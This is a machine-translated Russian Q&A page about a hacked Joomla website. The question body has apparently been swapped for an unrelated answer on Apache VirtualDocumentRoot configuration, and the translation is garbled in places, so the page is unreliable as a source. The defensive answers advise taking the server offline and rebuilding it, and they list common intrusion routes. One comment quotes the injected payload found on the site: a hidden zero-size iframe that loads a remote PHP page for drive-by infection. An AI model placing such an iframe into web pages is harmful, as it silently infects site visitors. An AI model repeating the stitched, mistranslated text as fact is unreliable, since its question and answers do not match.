Сайт пошел на компромисс, кто-либо видел этот взлом прежде? - googleanalyticsresearchengine.eu

Разве Вы не можете использовать - вместо _ для t-y-u.fr? потому что Вы могли использовать уникальную массу vhost конфигурация как этот для всех Ваших доменов:


    VirtualDocumentRoot /web/awstats/%-2_%-1/
    ServerName anything
    ServerAlias stats.we.com stats.we.fr stats.doo.com ...

Проверьте http://httpd.apache.org/docs/2.2/mod/mod_vhost_alias.html на большее количество документации. Может быть путем добавления переписать правила, которое Вы могли изменить - _ в пути DocumentRoot. Эта потребность некоторые попытки.

Но обычно, дерево сделано как это:

/web/domaine.tld/public/
/web/domaine.tld/public/www/
/web/domaine.tld/public/stats/
/web/domaine.tld/public/..
/web/domaine.tld/logs/

И с одним vhost использованием имения VirtualDocumentRoot можно сделать то, что Вы хотите.

0
задан 23 November 2009 в 12:09
2 ответа

Не тот, который я видел а именно, но это говорит Вам, что Ваша страница была изменена для запроса содержания (вероятно, iframe, который пытается загрузить взлом на автомобиле на машину клиента, или файл JavaScript для создания поп - под этим делает подобный).

Необходимо взять веб-сервер офлайн как можно скорее, поскольку можно невольно заражать посетителей чем-то противным. После того, как машина была взломана его, обычно рекомендуют полностью восстановить его, поскольку Вы не знаете, какие дополнительные бэкдоры хакер оставил позади для разрешения взломщику войти назад снова, после того как Вы чистите заражение (если Вы не знаете наверняка, что изменение было внесено совершенно из-за непривилегированной учетной записи пользователя, имеющей небезопасный пароль, который предполагался, или определенный неисправленный сценарий, который позволил изменение способом, которое не позволит более глубокие изменения).

Если Вы предоставляете больше определенную подробную информацию (ОС, веб-сервер, какие приложения/сценарии Вы установили...), мы смогли обеспечивать более определенную справку.

2
ответ дан 4 December 2019 в 15:24
  • 1
    Вы корректны, я проверил Firebug плавления сайта и существует следующая строка непосредственно после вводного тега основного текста - < ширина iframe =" 0" высота =" 0" frameborder =" 0" src =" web-bureau.com/templates/beez/menu.php " > < html> < head/> < body/> </html> </iframe> сайт является сайтом Joomla, я нахожусь на Mac OS с помощью Filezilla/Dreamweaver для моего Ftp. Я проверил web-bureau.com, и это похоже на нормальный сайт. Я проверил свои веб-файлы и не могу расположиться, где iframe вводится в код. –   23 November 2009 в 12:53
  • 2
    Это может добавляться файлом JavaScript, загруженным из другого сервера. Также мой ответ предположил, что это - Ваш собственный сервер (следовательно вопрос, спрашиваемый относительно serverfault), а не общий сервер - это корректно? –  David Spillett 23 November 2009 в 13:03

Мы регулярно видим клиентов с веб-сайтами, которые были стерты или иначе изменены, до такой степени, что мы просто написали статью блога о том, как постараться не получать Ваш зараженный вредоносными программами веб-сайт. В основном они обычно входят одним из нескольких различных методов:

  • Предположение паролей
  • Вторжение в код веб-приложения
  • Вторжение в рабочую станцию разработчика, и или получение пароля FTP оттуда или изменение локальной версии сайта
0
ответ дан 4 December 2019 в 15:24

Теги

Похожие вопросы